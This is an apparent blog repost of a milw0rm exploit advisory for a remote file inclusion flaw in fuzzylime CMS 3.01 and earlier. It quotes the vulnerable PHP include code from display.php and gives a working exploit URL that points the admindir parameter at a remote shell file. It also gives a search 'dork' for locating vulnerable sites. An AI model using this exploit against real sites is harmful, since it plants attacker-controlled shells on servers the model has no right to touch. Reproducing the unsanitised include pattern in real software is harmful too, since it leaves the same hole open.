Software And Internet Blog





March 15, 2008

Bug - fuzzylime cms <= 3.01 (admindir) Remote File Inclusion Vulnerability

Filed under: System Security

.—————————————————————————–.
| vuln.: fuzzylime cms <= 3.01 Remote File Inclusion Vulnerability |
| download: http://cms.fuzzylime.co.uk/ |
| dork: “powered by fuzzylime” |
| |
| author: irk4z@yahoo.pl |
| homepage: http://irk4z.wordpress.com/ |
| |
| greets to: cOndemned, str0ke, wacky |
‘—————————————————————————–’

# code:

/code/display.php:

1 2 $s = $_GET[s];
3 $p = $_GET[p];
4 $s = str_replace(”../”, “”, $s);
5 $p = str_replace(”../”, “”, $p);
6 if(empty($s)) $s = “front”;
7 if(empty($p)) $p = “index”;
8 $curs = $s;
9 $curp = $p;
10
11 include “code/settings.inc.php”;
12 include “${admindir}/languages/english.inc.php”;

line 11: ./code/code/settings.inc.php not exists so $admindir is empty :D :D

# exploit:

http://[HOST]/[PATH]/code/display.php?admindir=http://host/shell.txt?

# milw0rm.com [2008-03-14]

Comments »

The URI to TrackBack this entry is: http://blackraptor.blogsome.com/2008/03/15/bug-fuzzylime-cms/trackback/

No comments yet.

RSS feed for comments on this post.

Leave a comment

Line and paragraph breaks automatic, e-mail address never displayed, HTML allowed: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong>



Anti-spam measure: please retype the above text into the box provided.








Get free blog up and running in minutes with Blogsome
Theme designed by B A Khan